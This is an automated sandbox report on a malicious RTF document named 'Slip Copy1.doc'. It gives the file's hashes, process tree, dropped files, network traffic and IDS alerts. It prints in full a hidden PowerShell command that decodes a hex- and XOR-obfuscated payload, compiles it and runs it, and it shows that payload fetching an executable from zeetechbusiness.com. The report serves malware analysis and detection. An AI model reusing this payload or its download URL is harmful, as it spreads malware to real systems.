File name: | Slip Copy1.doc |
Full analysis: | https://app.any.run/tasks/c9ea7425-d697-4a9a-ae98-62598d0cb74b |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 08:29:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 0A9FBBA5354A54BD3DC37A3B3BDEFE5B |
SHA1: | 82AF4E5E82BD1E00E0698B4F892501C4742F06EF |
SHA256: | 0533268227076B87067688131C7B790800B7B4A7337C4D058F7EB622A714D976 |
SSDEEP: | 1536:oZdMkutGeCOZQmd1EUsgBAnEppBS1DMO8tdsDko0wzKN3hrDvNpk2LJHnxS:oHMLwzQjtxS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Slip Copy1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1472 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
1844 | powershell -WindowStyle Hidden function u91f2b8 { param($o41561) $gbda36 = 'cefe2';$e85339 = ''; for ($i = 0; $i -lt $o41561.length; $i+=2) { $n6c97 = [convert]::ToByte($o41561.Substring($i, 2), 16); $e85339 += [char]($n6c97 -bxor $gbda36[($i / 2) % $gbda36.length]); } return $e85339; } $r145cd3 = '16160f0b5543361f164606085d10410a0b0145611a1612005f4d37130b460a08034b7b0d1103175d13360317440a0603160916160f0b5543361f1646060848215b0202080a41170c05160916160f0b5543361f16460608482c7d5810150c5c0445351c4117000b4b7c06115d6838131004095b00450509531016461d0a0504041e6927090a2c5f130a14111a410e03175c06095557104f200811401a35090c5c17584422571735140a5122010217571016444c6f431513075e0a0646164602110f0612061d1200400d452f0b463311144550520654541a2a0b1235461145125d04565755571e1011140c5c0445175d000154035c1b583e22095e2a08160a40174d440e57110b03090151474a45770d11141c620c0c0811125e4544295d02012a0c501104141c104a3846154701090f0612101107115b0045031d46061708457b0d11361140431150000054544e1646110c0802120157515c0b004c5d3e760f092f08420c17124d100800140b570f5654471e43200811401a35090c5c175844335b111113045e33170911570011444c6f431513075e0a0646164602110f0612061d1200400d45040a5d0f45135c0401515f4d7b0d1136114043095e505654060549672a0b12354611451307545b5602071e43100f0b4643175453065449460a471745130c5c174510545001075f4c0938210a097b0e150917464b472d00400d000a56004d010a09104f45230b46111c360a5b0d115b476017092b0a44062803085d111c444912300012295310112317400c175b03530f16034c6f43161204460a0646004a1700140b12150a0f011214565f5701014d2f0b463311144541515353570b55492f0b463311144544575351061e0a0b12455d020300521b581513075e0a0646164602110f06120a0b12454007005456564b4c1d2c5c17351217120151575c064358461104065751541a165c570300015d4e470251555e5407530657060254555f5553414c4f5e5b054d0451035a515b587b0d113611404d3f03175d4a1e010a460c4504030300005d187b0d113611404311045400565804545151544e0706525c5249475a540057505b4d445700535d57500200535755025351565d005451515507535656560354474f4c090a034e1150525753580f2a0b123546114b3c00400c4c1d025d170a4607545206035e4f362c0811621717460905520154560b5e4d332c5c173512171b565e130c5c174509060701065b55090a034e44475a5304510b4b1104540056490a52030757555c1e531d52551e0c1012455d005004061b4a1e010a460c4504030300005d18701a11033e6f431100030755581d554a50544a554a05034a554a5a551b5e7b0d11361140430652515601582b0440100d07091c22090a0a512b220a0a5002094e561b58280717410b040a4b710c151f4d46050353531e534905510607074a561b5812555c0050074e0b5714452f0b463311144d46015454501c370a2f0b4655514e4c19531d565503014c4a060657010449014a5e04030300005c4565060725095b060b1245430757055d07575808004543320307710f0c030b464b4c5d1646110c08021204535e04000058230b440a17090b5f060b124b750611200a5e0700143553170d4e205c150c140a5c0e0008111c301503065b0209200a5e0700144b7313150a0c5102110f0a5c270412041b48473a39440254025105414e135c030557045d1a415102550252005655104a5e170100005d53511c270a110b5e0c0402235b0f004e100b520354070a4b475607035254545407535d52060602540555025652575202535553555656555753035555005550565257550355515e550456015600060255075553565c5604060254545502560357560602555354045754520602075454550a560052060355555555025206565303075555471b4f02505d5351064f5e62110a0500411036120440172c08035d431707070107580800454335140a5106161536460217122c5c050a4e02045b0454061b5835140a510616154b61170414111a11040456564a5e140046161708450258181610500f0c0545411704120c51431612175b0d0246100b520354070a4b1612175b0d02460305565d5f521b181612175b0d0246110a55505456005e470500540657445e4117170f0b55431150000054545b3646110c08021c260816114b580309171a0a0b12455b5e555d0c0e0552535d0b544b2a005c04110e5e5b4858544c49011c12001201540557035e26090b440617124b660c271f11574b0351500a5a52483647011612175b0d024e0c1e514c4a54044a5e1253575152574e0f4b060e04404a4d0454515154463b12175d50500050573d4d5b4c574f451743115e53075156544b7e060b01115a3e4c5d1840061113175c431150000054545d184f'; $r145cd32 = u91f2b8($r145cd3); Add-Type -TypeDefinition $r145cd32; [x8fab]::rde23d(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
608 | "C:\Program Files\Microsoft Office\Office14\excelcnv.exe" -Embedding | C:\Program Files\Microsoft Office\Office14\excelcnv.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3112 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\gur05efd.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3820 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES339.tmp" "c:\Users\admin\AppData\Local\Temp\CSC338.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF06B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1472 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF86A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1844 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K7TQUTJUJ2WQN86T9KPZ.temp | — | |
MD5:— | SHA256:— | |||
608 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\CVRFFEC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
608 | excelcnv.exe | C:\Users\admin\AppData\Local\Temp\~DF5C41FAC45B6DA6F3.TMP | — | |
MD5:— | SHA256:— | |||
3688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2084925E4A3491B1.TMP | — | |
MD5:— | SHA256:— | |||
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC338.tmp | — | |
MD5:— | SHA256:— | |||
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\gur05efd.pdb | — | |
MD5:— | SHA256:— | |||
3820 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES339.tmp | — | |
MD5:— | SHA256:— | |||
3112 | csc.exe | C:\Users\admin\AppData\Local\Temp\gur05efd.dll | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1844 | powershell.exe | GET | 301 | 198.136.51.245:80 | http://zeetechbusiness.com/loki/temp/css/html/see.exe | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1844 | powershell.exe | 198.136.51.245:80 | zeetechbusiness.com | HostDime.com, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
zeetechbusiness.com |
| malicious |
www.zeetechbusiness.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1844 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ |
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ |
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|